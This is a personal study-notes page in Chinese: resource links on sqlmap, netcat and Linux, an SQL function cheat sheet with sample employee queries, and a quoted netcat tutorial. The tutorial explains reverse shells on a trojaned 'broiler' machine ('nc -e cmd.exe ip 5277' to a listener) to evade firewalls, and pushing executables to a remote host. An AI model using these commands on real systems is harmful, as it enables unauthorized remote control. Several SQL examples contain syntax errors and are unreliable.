美文网首页
2017-12-28

2017-12-28

作者: zeromemcpy | 来源:发表于2017-12-28 21:45 被阅读0次

    http://www.freebuf.com/articles/web/156483.html // linux

    http://www.cnblogs.com/stayreal/p/3907206.html // to read

    http://blog.csdn.net/zsf1235/article/details/50974194 //sqlMap which is very useful

    http://blog.csdn.net/earbao/article/details/49633789 //nc 瑞士军刀 //netcat

    http://blog.csdn.net/zzyoucan/article/details/9235685

    http://blog.csdn.net/a584226635/article/details/60757344

    http://blog.csdn.net/lanzhizhuxia/article/details/7990005 // important ????????????

    http://blog.csdn.net/xiong_1234/article/details/68926351 // sql easy query

    http://www.cnblogs.com/stayreal/p/3906715.html // sql easy query
    https://www.cnblogs.com/stayreal/p/3907206.html // sql diffcult query

    sql常用函数
    /*
    version() database() user() currentuser()
    str="abcd"
    right(str,1) d
    left(str,1) a
    substr(str,1,1) b
    replace(str,'a','A') Abcd
    upper lower length len
    floor(1.029) = 1
    getdate() //获取当前时间
    month(date) 月 year(date) day(date)
    nvl(exp1,exp2) 如果exp1为空,则返回exp2,否则返回exp1
    select nvl('','A') from Job // 'A'
    nvl2(exp1,exp2,exp2) exp1 != null ? exp2 : exp3
    select nvl2('a','A','B')) from Job // 'A'
    ascii // 返回与指定字符对应的十进制数 ascii('A') == 65
    chr // 给出整数,返回字符 chr(65) = 'A'
    concat // 连接字符串 //常见于sql注入??? concat('abcd','1234') = abcd1234
    instr(big,small,beginIndex,times) // beginIndex big字符串开始搜索的位置 ,times 第几次出现
    select instr('oractle traning','ra',1,2) instring from Job

    instring

    9

    rpad(str,count,ch) 在字符的右边补充count个ch 在列的右边粘贴字符

    select lpad(rpad('gao',5,''),1,'') from Job

    *gao*****

    datediff(year,date,getdate())>10 // 获取工作年数大于10的

    min max count avg

    having group by like not like %c%

    inner join left join right join full join + table2 + on +table1.xxx = table2.xxx
    //查询员工姓名,所在部门编号和名称
    select ename,EMP.dno,DEPA.name from EMP inner join DEPA on EMP.dno = DEPA.dno
    因为dno重复了,所以要写清楚是哪个表的 EMP.dno

    //查询员工姓名,工作,领导姓名 //带有重复字段的时候一定要加表名,不然分不清是哪个表的数据
    select e1.name,e1.job,e2.name from EMP e1 inner join EMP e2 on e1.mang = e2.no

    //查询员工姓名,工作,领导名字,部门名称
    select e1.name,e1.job,e2.name DEPA.name from EMP e1 DEPA inner join EMP e2 on e1.mang = e2.no where e1.dno = DEPA.no

    //查询每个部门的员工数量
    select dno,count(*) from EMP group by dno

    //求出每个部分的平均工资 降序排序
    select dno,avg(sal) from EMP group by dno order by desc

    //求出每个部门工资大于5000的员工数目
    select dno,count(*) from EMP where sal>5000 group by dno

    //求出每个部门最高工资
    select dno,max(sal) from EMP group by dno

    //求出平均工资大于2000的部门编号和平均工资
    select dno,avg(sal) from EMP group by dno having avg(sal)>2000

    //求出非销售人员外,所有从事同一工作,并且工资大于5000的员工的月工资总和,升序排列 order by //默认升序asc
    select jno,sum(sal) from EMP where sal>5000 and job<>'sales' group by jno order by sum(sal)

    and or union

    //求出工资比7111高,与7112工作相同的员工
    select * from EMP where sal>(select sal from EMP where eno=7111) and job=(select job from EMP where eno = 7112)

    //求出最低工资的员工姓名,工作,工资
    select ename,job,sal from EMP where sal=(select min(sal) from EMP )
    */

    https://www.cnblogs.com/SnSpd/p/5926649.html // linux 常用函数 // what to do is to view common func and other
    什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说
    不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你
    这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。

    这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么?
    咳!!听我给你讲啊!!(先交100000000RMB学费)哇,别杀我啊!!)

    nc -l -p 5277 (坚听本地5277端口)

    同样也可以用

    nc -l -v -p 5277

    运行在本地

    然后在远程机器上,想办法运行

    nc -e cmd.exe ip 5277

    (你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!!

    呵呵,看看在本地机器上出现了什么?

    这样就是反弹~~在本地机器上得到了一个SHELL

    首先,在远程机上运行命令:

    nc -v -l -p 5277 > c:\pulist.exe

    这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口

    并把接受到的信息数据写到c:\pulist.exe中

    这时候在本地机上运行

    nc -v -n ip 5277 < e:\hack\pulist.exe

    这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上

    这样远程主机就会自动创建一个pulist.exe文件。。

    fd[0]:读管道,fd[1]:写管道。// 0 stdin 1 stdout 2 stderr

    相关文章

      网友评论

          本文标题:2017-12-28

          本文链接:https://www.haomeiwen.com/subject/sbkbgxtx.html